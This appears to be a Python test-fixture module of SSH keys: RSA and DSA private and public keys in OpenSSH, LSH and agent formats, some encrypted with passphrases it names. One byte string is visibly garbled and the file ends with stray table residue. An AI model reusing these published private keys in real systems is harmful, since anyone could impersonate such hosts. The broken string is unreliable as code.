# OpenSSH at some point.
privateRSA_openssh_alternate = b"""-----BEGIN RSA PRIVATE KEY-----
MIIEqTCCBKMCAQACggEBANVqrHgj1tYb7CWhUMR3Y1CERQFVQhQqKuDQYO7U6aOtSvo5Bl6EVXVf
ADa/b6oqP4MmN8FpLlv98PPSfdaYzTpAeNXKqBjAEZMkCQyBTI/3nO0TFmqkBOlJd8PkVWSzeWie
LAjrrOgELSF3BaeO71MwDaXluz1q4gk2b/00031vRv+H2qkpJ6r/rfWF5j4auHodSrHqwFr3MN8f
wqTk7z+RSZZA1Rl3LTfDXuydpjpEpcKkKd3Vupw9RbPGLBhk1bo936t/zUKsp/EYC6BYFWILpCpu
Q8PkBJ81o0eORu0zpWW9vDspbgILV9906BO0NzV+g18gJmCm3K2Lxmx5mPcCAwEAAQKCAQAhTAhm
oijVtPuOD3IbhQkAufJON/AcV0vjUX+eI6fkOphVG+qLepgevNi6sfmJEhhgrOjMC04JWkBqui+Z
+LMkYIS5zmmVmvni/B9RTScV2ysnre+0aay+fRDrhkdwc7QAh5UVOzf55xTngLtoHhvm3btzY7ln
5rInf8/PMJvCmP3ZGDYvNi7xPYF6n+EDLUfbNFFiOd1P6ayoi9nW84TEF7lxnQYIQnhNu8Uq9MNY
zVUr7b4zXwTqe+YEJGPyLdc9G2zVnGNDL5KIjT5u2hg32A8lZ4kduUY0XsnOxIvtklozBw/fhgj5
kunb6zgINsnNzQoBSFs5PnrKxoCp3NQ5AoGBANlwBtjivNR4kVCU1MEbiThsRmRaUaCaBz1IjwNR
zGsSjn0asWXncXU54DIFdY0YTK+TsUmxZl94YnrRDMrmTUOznPRrfeYMmNzPIWKO1S4S3gSu1yRu
gzGiFaJEPSKpYiYiubLtVAqdCIOnBw3/GRiO2Ksd2kicMWgRoWZt49gdAoGBAPtEF4ukNr4eNx2n
9mFsBMSq3Xg+B4weMwKuAxSHg3rlnn0IZ6jyqr8ScM9yqafHCx2I1SD9nGPKRzBVTovEz/R/FqSS
EnShCcLEbpyMM++l5ffgK61PXBGqGoQ3W/166sPNfLDI5B9UY7XHr9/0Caf8xyX8XOmR15LFmB5W
07EjAoGAUa/pkp+UC0qEZT6UszuSELV0uIzJ78kOATL6L2gSoQMmrs9RaBRMJpsopAIzCF/hp3CY
ATR5XlKOxM82vB9LVazrwVOEx+FhqErUov9ADYAfEqlQwCoYdZQMBpsWUKhL7EHNe+/3S8l1AmjE
mLiGiBhaQ+cCM5ciZJODDEUqfO0CgYBpZjfGQN0hxQTzsLg+R5R8dvwt6z85PJXDQwFRxEKX8+gW
pMbu7NRJEFA4BO47zdfQzMwyaZAHoBtan/4xzR46fnEeGZQaTk8M319S1dEXbuzXnLZVnduOIV+8
JIi2/K+r8O+kLLDcn4awAxK4i+LdD8DuIz1KUP4vuClGWL+2JwKBgQCFSxt6mxIQN54frV7a/saW
/t81a7k04haXkiYJvb1wIAOnNb0tG6DSB0cr1N6oqAcHG7gEIKcnQTxsOTnpQc7nFx3RTFy8PdIm
Jv5q1v1Icq5G+nvD0xlgRB2lE6eA9WMp1HpdBgcWXfaLPctkOuKEWk2MBi0tnRzrg0x4PXlUzjAA
-----END RSA PRIVATE KEY-----"""
# Encrypted with the passphrase 'encrypted'
privateRSA_openssh_encrypted = b"""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,FFFFFFFFFFFFFFFF
qRwdy/fEJQbRccoyOdhJCQv5FpsbSJWtvOTLjrURDrjpO0WvOsvwV/ltLAZtD8b3
CSlgi8eGZk+rFKNMn1uUWuVeQR3Mfn2PE2hgB0Qc0HkdfG92cnVzoRjKRQxxJM5o
F4/1MSLhwQxLF53DHWfyzK8rFNUBRyRRBFevXwPfbp6DhFy+TkqOcrLufJT7x7BC
MvMNjILVhNr9hnIMkzmAiBo9lhJ0CHdWhcQHaX7Wk6UcGNDsYrwBoLlKPQlEGMU1
2scCi1UAbCilVLyUpHFuQeCzJHBl0YuLjwmo1kSv9U5E4ysh/FIuRf3aW91OK1+y
5rPE+zJYnzNAZ/Rl9xqtvTh8hlMwjdt582HbiJb6zJw5/NEz9OKyaJjjqZsZQ1TY
GOhV0Oqwx54jpkCh0XwJ2ofmcNuiO8LoUVBE124pa6ePSxLorqBhtq9nTgwUv1Mx
lFioAM6xGBSugCRZgbapHAw0M/I8Fa95A2ocRgx0N6TMp3ZBVltovb8pZrAGld3L
T5VWGDl3ZX/eM8YlXDupewOpb56g55Aevl0jERktqJdl+g9D+PXnCsJgxMcJbfl5
tWY9KoMxV+2Fj68SHdr/acCp7xgUMwHvVLFfYCeK/hpEe9O8vOAMTlXuq9zCMDAx
kL2kcSFbZHerc4TijtjXEALo06gYHEcLRtI6lvYrzbbmpCD7J7AnMzS3SQ2FzbFM
GARKfxBnYp0dZTDiY5HE45r8xWzUupoFcIuxKtuhBEtT7H2Ynv1NmU9qQRj8C1U5
LgM3lVEkrh4o1aBIAqX0OA4do08h2pdp9v0E4HKtCjSL5EBC6xrxmIY6b6dwCDLU
n16mv4jeKGy2IKvnF9r8HXdUG0yisNGxeq5Uf7STGH5KcCRrJCBZbawAbwURaLRo
HVydDP+5uEMMVjULpYgtuNo6gw6NczOhzgYAm3v2ZMjmZ8gclOsbRrH74XiOV8kd
89oYN5yNHD2EBqP5271kbmsYZ3VwBGN+HUdWIDi3gbFfHcmy59YQt09mZIMMwD7r
nRK+AKfBnNeMK9yZkkTRs3FwY4ZJdYn58pWfe4DNqMI7U5BQ9QZnLkfGLUqWtghX
jrselJrtSEMkll+feFf7jxiCKAwC/cWe1cvukjYPA6k75Wv7RaDENfwMlZtN+pfl
pzKqId20HhMNOceaeZagL+xzM1RRj+VcXR9BWfHI2AXZPcpTGAJwDOoQA64L9YGW
7QzxHmcDTlV0e59CpAdCLj//rQxFpYnuuJlwV2YyHYnvzfxsVge7u5ApcuBpNTjf
N46Heh24xXfqfM7OcO3BB71VfcvCNQavsp70PAtj4loShX6FpzatNX0iZasB988E
TtuiJ+9e7vH0xEhBLJIUJT9LvMto25KLHFHwSQXKEXM+hiY2nfObc1Cku4lBmy+7
uWpZrh3hkmKUtfdiyeqUUj1ypwZ6boZO1UZo0xTrpubmKQEvd2957YrEEVsi0LeB
uEzSlUXrwIV7Qw2VhoLxIaCyl5j4nOKetUeAjqVNi9makh0x4Ion5osxxYvYS9s/
Y48ATMnwm3+CdN6LE3IykHyHs7JuZmawWDR4CKJB6M1r0X+Xwgs0tQ==
-----END RSA PRIVATE KEY-----"""
# Encrypted with the passphrase 'testxp'. NB: this key was generated by
# OpenSSH, so it doesn't use the same key data as the other keys here.
privateRSA_openssh_encrypted_aes = b"""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0673309A6ACCAB4B77DEE1C1E536AC26
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----"""
publicRSA_lsh = (
b'{KDEwOnB1YmxpYy1rZXkoMTQ6cnNhLXBrY3MxLXNoYTEoMTpuMjU3OgDVaqx4I9bWG+wloVD'
b'Ed2NQhEUBVUIUKirg0GDu1OmjrUr6OQZehFV1XwA2v2+qKj+DJjfBaS5b/fDz0n3WmM06QHj'
b'VyqgYwBGTJAkMgUyP95ztExZqpATpSXfD5FVks3loniwI66zoBC0hdwWnju9TMA2l5bs9auI'
b'JNm/9NNN9b0b/h9qpKSeq/631heY+Grh6HUqx6sBa9zDfH8Kk5O8/kUmWQNUZdy03w17snaY'
b'6RKXCpCnd1bqcPUWzxiwYZNW6Pd+rf81CrKfxGAugWBViC6QqbkPD5ASfNaNHjkbtM6Vlvbw'
b'7KW4CC1ffdOgTtDc1foNfICZgptyti8ZseZj3KSgxOmUzOgEAASkpKQ==}'
)
privateRSA_lsh = (
b"(11:private-key(9:rsa-pkcs1(1:n257:\x00\xd5j\xacx#\xd6\xd6\x1b\xec%\xa1P"
b"\xc4wcP\x84E\x01UB\x14**\xe0\xd0`\xee\xd4\xe9\xa3\xadJ\xfa9\x06^\x84Uu_"
b"\x006\xbfo\xaa*?\x83&7\xc1i.[\xfd\xf0\xf3\xd2}\xd6\x98\xcd:@x\xd5\xca"
b"\xa8\x18\xc0\x11\x93$\t\x0c\x81L\x8f\xf7\x9c\xed\x13\x16j\xa4\x04\xe9Iw"
b"\xc3\xe4Ud\xb3yh\x9e,\x08\xeb\xac\xe8\x04-!w\x05\xa7\x8e\xefS0\r\xa5\xe5"
b"\xbb=j\xe2\t6o\xfd4\xd3}oF\xff\x87\xda\xa9)'\xaa\xff\xad\xf5\x85\xe6>"
b"\x1a\xb8z\x1dJ\xb1\xea\xc0Z\xf70\xdf\x1f\xc2\xa4\xe4\xef?\x91I\x96@\xd5"
b"\x19w-7\xc3^\xec\x9d\xa6:D\xa5\xc2\xa4)\xdd\xd5\xba\x9c=E\xb3\xc6,\x18d"
b"\xd5\xba=\xdf\xab\x7f\xcdB\xac\xa7\xf1\x18\x0b\xa0X\x15b\x0b\xa4*nC\xc3"
b"\xe4\x04\x9f5\xa3G\x8eF\xed3\xa5e\xbd\xbc;)n\x02\x0bW\xdft\xe8\x13\xb475"
b"~\x83_ &`\xa6\xdc\xad\x8b\xc6ly\x98\xf7)(1:e3:\x01\x00\x01)(1:d256:!L"
b"\x08f\xa2(\xd5\xb4\xfb\x8e\x0fr\x1b\x85\t\x00\xb9\xf2N7\xf0\x1cWK\xe3Q"
b"\x7f\x9e#\xa7\xe4:\x98U\x1b\xea\x8bz\x98\x1e\xbc\xd8\xba\xb1\xf9\x89\x12"
b"\x18`\xac\xe8\xcc\x0bN\tZ@j\xba/\x99\xf8\xb3$`\x84\xb9\xcei\x95\x9a\xf9"
b"\xe2\xfc\x1fQM'\x15\xdb+'\xad\xef\xb4i\xac\xbe}\x10\xeb\x86Gps\xb4\x00"
b"\x87\x95\x15;7\xf9\xe7\x14\xe7\x80\xbbh\x1e\x1b\xe6\xdd\xbbsc\xb9g\xe6"
b"\xb2'\x7f\xcf\xcf0\x9b\xc2\x98\xfd\xd9\x186/6.\xf1=\x81z\x9f\xe1\x03-G"
b"\xdb4Qb9\xddO\xe9\xac\xa8\x8b\xd9\xd6\xf3\x84\xc4\x17\xb9q\x9d\x06\x08Bx"
b"M\xbb\xc5*\xf4\xc3X\xcdU+\xed\xbe3_\x04\xea{\xe6\x04$c\xf2-\xd7=\x1bl"
b"\xd5\x9ccC/\x92\x88\x8d>n\xda\x187\xd8\x0f%g\x89\x1d\xb9F4^\xc9\xce\xc4"
b"\x8b\xed\x92Z3\x07\x0f\xdf\x86\x08\xf9\x92\xe9\xdb\xeb8\x086\xc9\xcd\xcd"
b"\n\x01H[9>z\xca\xc6\x80\xa9\xdc\xd49)(1:p129:\x00\xfbD\x17\x8b\xa46\xbe"
b"\x1e7\x1d\xa7\xf6al\x04\xc4\xaa\xddx>\x07\x8c\x1e3\x02\xae\x03\x14\x87"
b"\x83z\xe5\x9e}\x08g\xa8\xf2\xaa\xbf\x12p\xcfr\xa9\xa7\xc7\x0b\x1d\x88"
b"\xd5 \xfd\x9cc\xcaG0UN\x8b\xc4\xcf\xf4\x7f\x16\xa4\x92\x12t\xa1\t\xc2"
b"\xc4n\x9c\x8c3\xef\xa5\xe5\xf7\xe0+\xadO\\\x11\xaa\x1a\x847[\xfdz\xea"
b"\xc3\xcd|\xb0\xc8\xe4\x1fTc\xb5\xc7\xaf\xdf\xf4\t\xa7\xfc\xc7%\xfc\\\xe9"
b"\x91\xd7\x92\xc5\x98\x1eV\xd3\xb1#)(1:q129:\x00\xd9p\x06\xd8\xe2\xbc\xd4"
b"x\x91P\x94\xd4\xc1\x1b\x898lFdZQ\xa0\x9a\x07=H\x8f\x03Q\xcck\x12\x8e}"
b"\x1a\xb1e\xe7qu9\xe02\x05u\x8d\x18L\xaf\x93\xb1I\xb1f_xbz\xd1\x0c\xca"
b"\xe6MC\xb3\x9c\xf4k}\xe6\x0c\x98\xdc\xcf!b\x8e\xd5.\x12\xde\x04\xae\xd7$"
b"n\x831\xa2\x15\xa2D=\"\xa9b&\"\xb9\xb2\xedT\n\x9d\x08\x83\xa7\x07\r\xff"
b"\x19\x18\x8e\xd8\xab\x1d\xdaH\x9c1h\x11\xa1fm\xe3\xd8\x1d)(1:a128:if7"
b"\xc6@\xdd!\xc5\x04\xf3\xb0\xb8>G\x94|v\xfc-\xeb?9<\x95\xc3C\x01Q\xc4B"
b"\x97\xf3\xe8\x16\xa4\xc6\xee\xec\xd4I\x10P8\x04\xee;\xcd\xd7\xd0\xcc\xcc"
b"2i\x90\x07\xa0\x1bZ\x9f\xfe1\xcd\x1e:~q\x1e\x19\x94\x1aNO\x0c\xdf_R\xd5"
b"\xd1\x17n\xec\xd7\x9c\xb6U\x9d\xdb\x8e!_\xbc$\x88\xb6\xfc\xaf\xab\xf0"
b"\xef\xa4,\xb0\xdc\x9f\x86\xb0\x03\x12\xb8\x8b\xe2\xdd\x0f\xc0\xee#=JP"
b"\xfe/\xb8)FX\xbf\xb6')(1:b128:Q\xaf\xe9\x92\x9f\x94\x0bJ\x84e>\x94\xb3;"
b"\x92\x10\xb5t\xb8\x8c\xc9\xef\xc9\x0e\x012\xfa/h\x12\xa1\x03&\xae\xcfQh"
b"\x14L&\x9b(\xa4\x023\x08_\xe1\xa7p\x98\x014y^R\x8e\xc4\xcf6\xbc\x1fKU"
b"\xac\xeb\xc1S\x84\xc7\xe1a\xa8J\xd4\xa2\xff@\r\x80\x1f\x12\xa9P\xc0*\x18"
b"u\x94\x0c\x06\x9b\x16P\xa8K\xecA\xcd{\xef\xf7K\xc9u\x02h\xc4\x98\xb8\x86"
b"\x88\x18ZC\xe7\x023\x97\"d\x93\x83\x0cE*|\xed)(1:c129:\x00\x85K\x1bz\x9b"
b"\x12\x107\x9e\x1f\xad^\xda\xfe\xc6\x96\xfe\xdf5k\xb94\xe2\x16\x97\x92&\t"
b"\xbd\xbdp \x03\xa75\xbd-\x1b\xa0\xd2\x07G+\xd4\xde\xa8\xa8\x07\x07\x1b"
b"\xb8\x04 \xa7'A<l99\xe9A\xce\xe7\x17\x1d\xd1L\\\xbc=\xd2&&\xfej\xd6\xfd"
b"Hr\xaeF\xfa{\xc3\xd3\x19`D\x1d\xa5\x13\xa7\x80\xf5c)\xd4z]\x06\x07\x16]"
b"\xf6\x8b=\xcbd:\xe2\x84ZM\x8c\x06--\x9d\x1c\xeb\x83Lx=yT\xce)))"
)
privateRSA_agentv3 = (
b"\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x03\x01\x00\x01\x00\x00\x01\x00!L"
b"\x08f\xa2(\xd5\xb4\xfb\x8e\x0fr\x1b\x85\t\x00\xb9\xf2N7\xf0\x1cWK\xe3Q"
b"\x7f\x9e b"\x18`\xac\xe8\xcc\x0bN\tZ@j\xba/\x99\xf8\xb3$`\x84\xb9\xcei\x95\x9a\xf9"
b"\xe2\xfc\x1fQM'\x15\xdb+'\xad\xef\xb4i\xac\xbe}\x10\xeb\x86Gps\xb4\x00"
b"\x87\x95\x15;7\xf9\xe7\x14\xe7\x80\xbbh\x1e\x1b\xe6\xdd\xbbsc\xb9g\xe6"
b"\xb2'\x7f\xcf\xcf0\x9b\xc2\x98\xfd\xd9\x186/6.\xf1=\x81z\x9f\xe1\x03-G"
b"\xdb4Qb9\xddO\xe9\xac\xa8\x8b\xd9\xd6\xf3\x84\xc4\x17\xb9q\x9d\x06\x08Bx"
b"M\xbb\xc5*\xf4\xc3X\xcdU+\xed\xbe3_\x04\xea{\xe6\x04$c\xf2-\xd7=\x1bl"
b"\xd5\x9ccC/\x92\x88\x8d>n\xda\x187\xd8\x0f%g\x89\x1d\xb9F4^\xc9\xce\xc4"
b"\x8b\xed\x92Z3\x07\x0f\xdf\x86\x08\xf9\x92\xe9\xdb\xeb8\x086\xc9\xcd\xcd"
b"\n\x01H[9>z\xca\xc6\x80\xa9\xdc\xd49\x00\x00\x01\x01\x00\xd5j\xacx#\xd6"
b"\xd6\x1b\xec%\xa1P\xc4wcP\x84E\x01UB\x14**\xe0\xd0`\xee\xd4\xe9\xa3\xadJ"
b"\xfa9\x06^\x84Uu_\x006\xbfo\xaa*?\x83&7\xc1i.[\xfd\xf0\xf3\xd2}\xd6\x98"
b"\xcd:@x\xd5\xca\xa8\x18\xc0\x11\x93$\t\x0c\x81L\x8f\xf7\x9c\xed\x13\x16j"
b"\xa4\x04\xe9Iw\xc3\xe4Ud\xb3yh\x9e,\x08\xeb\xac\xe8\x04-!w\x05\xa7\x8e"
b"\xefS0\r\xa5\xe5\xbb=j\xe2\t6o\xfd4\xd3}oF\xff\x87\xda\xa9)'\xaa\xff\xad"
b"\xf5\x85\xe6>\x1a\xb8z\x1dJ\xb1\xea\xc0Z\xf70\xdf\x1f\xc2\xa4\xe4\xef?"
b"\x91I\x96@\xd5\x19w-7\xc3^\xec\x9d\xa6:D\xa5\xc2\xa4)\xdd\xd5\xba\x9c=E"
b"\xb3\xc6,\x18d\xd5\xba=\xdf\xab\x7f\xcdB\xac\xa7\xf1\x18\x0b\xa0X\x15b"
b"\x0b\xa4*nC\xc3\xe4\x04\x9f5\xa3G\x8eF\xed3\xa5e\xbd\xbc;)n\x02\x0bW\xdf"
b"t\xe8\x13\xb475~\x83_ &`\xa6\xdc\xad\x8b\xc6ly\x98\xf7\x00\x00\x00\x81"
b"\x00\x85K\x1bz\x9b\x12\x107\x9e\x1f\xad^\xda\xfe\xc6\x96\xfe\xdf5k\xb94"
b"\xe2\x16\x97\x92&\t\xbd\xbdp \x03\xa75\xbd-\x1b\xa0\xd2\x07G+\xd4\xde"
b"\xa8\xa8\x07\x07\x1b\xb8\x04 \xa7'A<l99\xe9A\xce\xe7\x17\x1d\xd1L\\\xbc="
b"\xd2&&\xfej\xd6\xfdHr\xaeF\xfa{\xc3\xd3\x19`D\x1d\xa5\x13\xa7\x80\xf5c)"
b"\xd4z]\x06\x07\x16]\xf6\x8b=\xcbd:\xe2\x84ZM\x8c\x06--\x9d\x1c\xeb\x83Lx"
b"=yT\xce\x00\x00\x00\x81\x00\xd9p\x06\xd8\xe2\xbc\xd4x\x91P\x94\xd4\xc1"
b"\x1b\x898lFdZQ\xa0\x9a\x07=H\x8f\x03Q\xcck\x12\x8e}\x1a\xb1e\xe7qu9\xe02"
b"\x05u\x8d\x18L\xaf\x93\xb1I\xb1f_xbz\xd1\x0c\xca\xe6MC\xb3\x9c\xf4k}\xe6"
b"\x0c\x98\xdc\xcf!b\x8e\xd5.\x12\xde\x04\xae\xd7$n\x831\xa2\x15\xa2D=\""
b"\xa9b&\"\xb9\xb2\xedT\n\x9d\x08\x83\xa7\x07\r\xff\x19\x18\x8e\xd8\xab"
b"\x1d\xdaH\x9c1h\x11\xa1fm\xe3\xd8\x1d\x00\x00\x00\x81\x00\xfbD\x17\x8b"
b"\xa46\xbe\x1e7\x1d\xa7\xf6al\x04\xc4\xaa\xddx>\x07\x8c\x1e3\x02\xae\x03"
b"\x14\x87\x83z\xe5\x9e}\x08g\xa8\xf2\xaa\xbf\x12p\xcfr\xa9\xa7\xc7\x0b"
b"\x1d\x88\xd5 \xfd\x9cc\xcaG0UN\x8b\xc4\xcf\xf4\x7f\x16\xa4\x92\x12t\xa1"
b"\t\xc2\xc4n\x9c\x8c3\xef\xa5\xe5\xf7\xe0+\xadO\\\x11\xaa\x1a\x847[\xfdz"
b"\xea\xc3\xcd|\xb0\xc8\xe4\x1fTc\xb5\xc7\xaf\xdf\xf4\t\xa7\xfc\xc7%\xfc\\"
b"\xe9\x91\xd7\x92\xc5\x98\x1eV\xd3\xb1#"
)
publicDSA_openssh = b"""\
ssh-dss AAAAB3NzaC1kc3MAAACBAJKQOsVERVDQIpANHH+JAAylo9\
LvFYmFFVMIuHFGlZpIL7sh3IMkqy+cssINM/lnHD3fmsAyLlUXZtt6PD9LgZRazsPOgptuH+Gu48G\
+yFuE8l0fVVUivos/MmYVJ66qT99htcZKatrTWZnpVW7gFABoqw+he2LZ0gkeU0+Sx9a5AAAAFQD0\
EYmTNaFJ8CS0+vFSF4nYcyEnSQAAAIEAkgLjxHJAE7qFWdTqf7EZngu7jAGmdB9k3YzMHe1ldMxEB\
7zNw5aOnxjhoYLtiHeoEcOk2XOyvnE+VfhIWwWAdOiKRTEZlmizkvhGbq0DCe2EPMXirjqWACI5nD\
ioQX1oEMonR8N3AEO5v9SfBqS2Q9R6OBr6lf04RvwpHZ0UGu8AAACAAhRpxGMIWEyaEh8YnjiazQT\
NEpklRZqeBGo1gotJggNmVaIQNIClGlLyCi359efEUuQcZ9SXxM59P+hecc/GU/GHakW5YWE4dP2G\
gdgMQWC7S6WFIXePGGXqNQDdWxlX8umhenvQqa1PnKrFRhDrJw8Z7GjdHxflsxCEmXPoLN8= \
comment\
"""
privateDSA_openssh = b"""\
-----BEGIN DSA PRIVATE KEY-----
MIIBvAIBAAKBgQCSkDrFREVQ0CKQDRx/iQAMpaPS7xWJhRVTCLhxRpWaSC+7IdyD
JKsvnLLCDTP5Zxw935rAMi5VF2bbejw/S4GUWs7DzoKbbh/hruPBvshbhPJdH1VV
Ir6LPzJmFSeuqk/fYbXGSmra01mZ6VVu4BQAaKsPoXti2dIJHlNPksfWuQIVAPQR
iZM1oUnwJLT68VIXidhzISdJAoGBAJIC48RyQBO6hVnU6n+xGZ4Lu4wBpnQfZN2M
zB3tZXTMRAe8zcOWjp8Y4aGC7Yh3qBHDpNlzsr5xPlX4SFsFgHToikUxGZZos5L4
Rm6tAwnthDzF4q46lgAiOZw4qEF9aBDKJ0fDdwBDub/UnwaktkPUejga+pX9OEb8
KR2dFBrvAoGAAhRpxGMIWEyaEh8YnjiazQTNEpklRZqeBGo1gotJggNmVaIQNICl
GlLyCi359efEUuQcZ9SXxM59P+hecc/GU/GHakW5YWE4dP2GgdgMQWC7S6WFIXeP
GGXqNQDdWxlX8umhenvQqa1PnKrFRhDrJw8Z7GjdHxflsxCEmXPoLN8CFQDV2gbL
czUdxCus0pfEP1bddaXRLQ==
-----END DSA PRIVATE KEY-----\
"""
publicDSA_lsh = decodebytes(b"""\
e0tERXdPbkIxWW14cFl5MXJaWGtvTXpwa2MyRW9NVHB3TVRJNU9nQ1NrRHJGUkVWUTBDS1FEUngv
aVFBTXBhUFM3eFdKaFJWVENMaHhScFdhU0MrN0lkeURKS3N2bkxMQ0RUUDVaeHc5MzVyQU1pNVZG
MmJiZWp3L1M0R1VXczdEem9LYmJoL2hydVBCdnNoYmhQSmRIMVZWSXI2TFB6Sm1GU2V1cWsvZlli
WEdTbXJhMDFtWjZWVnU0QlFBYUtzUG9YdGkyZElKSGxOUGtzZld1U2tvTVRweE1qRTZBUFFSaVpN
MW9VbndKTFQ2OFZJWGlkaHpJU2RKS1NneE9tY3hNams2QUpJQzQ4UnlRQk82aFZuVTZuK3hHWjRM
dTR3QnBuUWZaTjJNekIzdFpYVE1SQWU4emNPV2pwOFk0YUdDN1loM3FCSERwTmx6c3I1eFBsWDRT
RnNGZ0hUb2lrVXhHWlpvczVMNFJtNnRBd250aER6RjRxNDZsZ0FpT1p3NHFFRjlhQkRLSjBmRGR3
QkR1Yi9Vbndha3RrUFVlamdhK3BYOU9FYjhLUjJkRkJydktTZ3hPbmt4TWpnNkFoUnB4R01JV0V5
YUVoOFluamlhelFUTkVwa2xSWnFlQkdvMWdvdEpnZ05tVmFJUU5JQ2xHbEx5Q2kzNTllZkVVdVFj
WjlTWHhNNTlQK2hlY2MvR1UvR0hha1c1WVdFNGRQMkdnZGdNUVdDN1M2V0ZJWGVQR0dYcU5RRGRX
eGxYOHVtaGVudlFxYTFQbktyRlJoRHJKdzhaN0dqZEh4ZmxzeENFbVhQb0xOOHBLU2s9fQ==
""")
privateDSA_lsh = decodebytes(b"""\
KDExOnByaXZhdGUta2V5KDM6ZHNhKDE6cDEyOToAkpA6xURFUNAikA0cf4kADKWj0u8ViYUVUwi4
cUaVmkgvuyHcgySrL5yywg0z+WccPd+awDIuVRdm23o8P0uBlFrOw86Cm24f4a7jwb7IW4TyXR9V
VSK+iz8yZhUnrqpP32G1xkpq2tNZmelVbuAUAGirD6F7YtnSCR5TT5LH1rkpKDE6cTIxOgD0EYmT
NaFJ8CS0+vFSF4nYcyEnSSkoMTpnMTI5OgCSAuPEckATuoVZ1Op/sRmeC7uMAaZ0H2TdjMwd7WV0
zEQHvM3Dlo6fGOGhgu2Id6gRw6TZc7K+cT5V+EhbBYB06IpFMRmWaLOS+EZurQMJ7YQ8xeKuOpYA
IjmcOKhBfWgQyidHw3cAQ7m/1J8GpLZD1Ho4GvqV/ThG/CkdnRQa7ykoMTp5MTI4OgIUacRjCFhM
mhIfGJ44ms0EzRKZJUWangRqNYKLSYIDZlWiEDSApRpS8got+fXnxFLkHGfUl8TOfT/oXnHPxlPx
h2pFuWFhOHT9hoHYDEFgu0ulhSF3jxhl6jUA3VsZV/LpoXp70KmtT5yqxUYQ6ycPGexo3R8X5bMQ
hJlz6CzfKSgxOngyMToA1doGy3M1HcQrrNKXxD9W3XWl0S0pKSk=
""")
privateDSA_agentv3 = decodebytes(b"""\
AAAAB3NzaC1kc3MAAACBAJKQOsVERVDQIpANHH+JAAylo9LvFYmFFVMIuHFGlZpIL7sh3IMkqy+c
ssINM/lnHD3fmsAyLlUXZtt6PD9LgZRazsPOgptuH+Gu48G+yFuE8l0fVVUivos/MmYVJ66qT99h
tcZKatrTWZnpVW7gFABoqw+he2LZ0gkeU0+Sx9a5AAAAFQD0EYmTNaFJ8CS0+vFSF4nYcyEnSQAA
AIEAkgLjxHJAE7qFWdTqf7EZngu7jAGmdB9k3YzMHe1ldMxEB7zNw5aOnxjhoYLtiHeoEcOk2XOy
vnE+VfhIWwWAdOiKRTEZlmizkvhGbq0DCe2EPMXirjqWACI5nDioQX1oEMonR8N3AEO5v9SfBqS2
Q9R6OBr6lf04RvwpHZ0UGu8AAACAAhRpxGMIWEyaEh8YnjiazQTNEpklRZqeBGo1gotJggNmVaIQ
NIClGlLyCi359efEUuQcZ9SXxM59P+hecc/GU/GHakW5YWE4dP2GgdgMQWC7S6WFIXePGGXqNQDd
WxlX8umhenvQqa1PnKrFRhDrJw8Z7GjdHxflsxCEmXPoLN8AAAAVANXaBstzNR3EK6zSl8Q/Vt11
pdEt
""")
__all__ = ['DSAData', 'RSAData', 'privateDSA_agentv3', 'privateDSA_lsh',
'privateDSA_openssh', 'privateRSA_agentv3', 'privateRSA_lsh',
'privateRSA_openssh', 'publicDSA_lsh', 'publicDSA_openssh',
'publicRSA_lsh', 'publicRSA_openssh', 'privateRSA_openssh_alternate']
| true | true |
